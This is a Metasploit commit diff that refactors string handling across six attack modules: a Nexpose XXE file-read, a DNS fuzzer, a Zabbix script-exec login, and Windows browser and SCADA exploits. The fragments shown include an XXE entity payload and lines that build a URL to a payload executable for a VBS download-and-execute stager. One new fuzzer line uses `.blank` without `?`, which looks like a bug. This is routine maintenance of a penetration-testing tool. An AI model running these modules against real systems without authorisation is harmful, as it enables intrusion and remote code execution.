Land #4709, fixed up some datastore mangling

2015-02-05 21:21:55 -06:00 · 2015-02-05 21:21:55 -06:00 · 036cb77dd0
parent 4e0a62cb3a fb3422c221
commit 036cb77dd0
6 changed files with 21 additions and 26 deletions
--- a/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
+++ b/modules/auxiliary/admin/http/nexpose_xxe_file_read.rb
@ -74,7 +74,7 @@ class Metasploit4 < Msf::Auxiliary

    xml = '<!DOCTYPE foo ['
    xml << '<!ELEMENT host ANY>'
-    xml << '<!ENTITY xxe SYSTEM "file://' << datastore['FILEPATH'] << '">'
+    xml << %Q{<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">}
    xml << ']>'
    xml << '<SiteSaveRequest session-id="'

--- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
+++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb
@ -330,22 +330,17 @@ class Metasploit3 < Msf::Auxiliary
  end

  def fix_variables
-    if datastore['OPCODE'] == ""
-      datastore['OPCODE'] = "QUERY,IQUERY,STATUS,UNASSIGNED,NOTIFY,UPDATE"
-    end
-    if datastore['CLASS'] == ""
-      datastore['CLASS'] = "IN,CH,HS,NONE,ANY"
-    end
-    if datastore['RR'] == ""
-      datastore['RR'] = "A,NS,MD,MF,CNAME,SOA,MB,MG,MR,NULL,WKS,PTR,"
-      datastore['RR'] << "HINFO,MINFO,MX,TXT,RP,AFSDB,X25,ISDN,RT,"
-      datastore['RR'] << "NSAP,NSAP-PTR,SIG,KEY,PX,GPOS,AAAA,LOC,NXT,"
-      datastore['RR'] << "EID,NIMLOC,SRV,ATMA,NAPTR,KX,CERT,A6,DNAME,"
-      datastore['RR'] << "SINK,OPT,APL,DS,SSHFP,IPSECKEY,RRSIG,NSEC,"
-      datastore['RR'] << "DNSKEY,DHCID,NSEC3,NSEC3PARAM,HIP,NINFO,RKEY,"
-      datastore['RR'] << "TALINK,SPF,UINFO,UID,GID,UNSPEC,TKEY,TSIG,"
-      datastore['RR'] << "IXFR,AXFR,MAILA,MAILB,*,TA,DLV,RESERVED"
-    end
+    @fuzz_opcode = datastore['OPCODE'].blank? ? "QUERY,IQUERY,STATUS,UNASSIGNED,NOTIFY,UPDATE" : datastore['OPCODE']
+    @fuzz_class  = datastore['CLASS'].blank? ? "IN,CH,HS,NONE,ANY" : datastore['CLASS']
+    fuzz_rr_queries = "A,NS,MD,MF,CNAME,SOA,MB,MG,MR,NULL,WKS,PTR," <<
+      "HINFO,MINFO,MX,TXT,RP,AFSDB,X25,ISDN,RT," <<
+      "NSAP,NSAP-PTR,SIG,KEY,PX,GPOS,AAAA,LOC,NXT," <<
+      "EID,NIMLOC,SRV,ATMA,NAPTR,KX,CERT,A6,DNAME," <<
+      "SINK,OPT,APL,DS,SSHFP,IPSECKEY,RRSIG,NSEC," <<
+      "DNSKEY,DHCID,NSEC3,NSEC3PARAM,HIP,NINFO,RKEY," <<
+      "TALINK,SPF,UINFO,UID,GID,UNSPEC,TKEY,TSIG," <<
+      "IXFR,AXFR,MAILA,MAILB,*,TA,DLV,RESERVED"
+    @fuzz_rr     = datastore['RR'].blank ? fuzz_rr_queries : datastore['RR']
  end

  def run_host(ip)
@ -381,7 +376,7 @@ class Metasploit3 < Msf::Auxiliary
        if @domain == nil
          print_status("DNS Fuzzer: DOMAIN could be set for health check but not mandatory.")
        end
-        nsopcode=datastore['OPCODE'].split(",")
+        nsopcode=@fuzz_opcode.split(",")
        opcode = setup_opcode(nsopcode)
        opcode.unpack("n*").each do |dnsOpcode|
          1.upto(iter) do
@ -414,11 +409,11 @@ class Metasploit3 < Msf::Auxiliary
          nsclass << req[:class]
          nsentry << req[:name]
        end
-        nsopcode=datastore['OPCODE'].split(",")
+        nsopcode=@fuzz_opcode.split(",")
      else
-        nsreq=datastore['RR'].split(",")
-        nsopcode=datastore['OPCODE'].split(",")
-        nsclass=datastore['CLASS'].split(",")
+        nsreq=@fuzz_rr.split(",")
+        nsopcode=@fuzz_opcode.split(",")
+        nsclass=@fuzz_class.split(",")
        begin
          classns = setup_nsclass(nsclass)
          raise ArgumentError, "Invalid CLASS: #{nsclass.inspect}" unless classns
--- a/modules/exploits/multi/http/zabbix_script_exec.rb
+++ b/modules/exploits/multi/http/zabbix_script_exec.rb
@ -79,7 +79,7 @@ class Metasploit4 < Msf::Exploit::Remote
    req = c.request_cgi({
      'method' => 'POST',
      'uri' => '/zabbix/',
-      'data' => 'request=&name=' << datastore['USERNAME'] << '&password=' << datastore['PASSWORD'] << '&enter=Sign+in'
+      'data' => "request=&name=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&enter=Sign+in"
    })

    login = c.send_recv(req.to_s.sub("Host:", "Host: " << datastore["RHOST"]))
--- a/modules/exploits/windows/browser/real_arcade_installerdlg.rb
+++ b/modules/exploits/windows/browser/real_arcade_installerdlg.rb
@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote

    # Payload's URL
    payload_src  = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-    payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"

    # Create the stager (download + execute payload)
    stager_name = rand_text_alpha(6) + ".vbs"
--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@ -130,7 +130,7 @@ class Metasploit3 < Msf::Exploit::Remote

    # Payload's URL
    payload_src = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
-    payload_src << ":" << datastore['SRVPORT'] << get_resource() + "/" + @payload_name + ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{get_resource}/#{@payload_name}.exe"

    # Create the stager (download + execute payload)
    stager = build_vbs(payload_src)
--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
    end

    payload_src  = lhost
-    payload_src << ":" << datastore['SRVPORT'] << datastore['URIPATH'] << @payload_name << ".exe"
+    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"

    stager_name = rand_text_alpha(6) + ".vbs"
    stager      = build_vbs(payload_src, stager_name)